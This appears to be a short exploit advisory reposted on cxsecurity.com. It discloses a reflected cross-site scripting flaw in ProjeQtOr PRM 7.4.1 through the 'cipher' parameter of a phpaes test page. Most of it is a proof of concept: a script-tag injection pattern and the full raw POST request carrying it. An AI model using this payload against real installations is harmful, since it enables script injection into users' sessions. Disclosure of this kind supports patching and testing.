ProjeQtOr PRM 7.4.1 - 'cipher' XSS Vulnerability

2019.04.15
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=========================================================================================== # Exploit Title: ProjeQtOr PRM 7.4.1 - 'cipher' XSS Vulnerability # Dork: N/A # Date: 11-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://projeqtor.org/ # Software Link: https://sourceforge.net/projects/projectorria/ # Version: 7.4.1 # Category: Webapps # Tested on: Wamp64, Windows # CVE: # Software Description: Complete, Collaborative, Quality based Open Source Project Organizer. =========================================================================================== # POC - XSS # Parameters : cipher # Attack Pattern : 1'"()&%<acx><ScRiPt >9zVr(9323)</ScRiPt> # POST Request: http://localhost/projeqtor/external/phpaes/test.php =========================================================================================== POST /projeqtor/external/phpaes/test.php HTTP/1.1 Content-Length: 109 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/projeqtor/ Cookie: PHPSESSID=offdnj5n8jha9v4gqsmusi1isn Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* decr=Decrypt%20it&cipher=1'"()%26%25<acx><ScRiPt%20>9zVr(9323)</ScRiPt>&plain=1&pt=1&pw=L0ck%20it%20up%20saf3


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top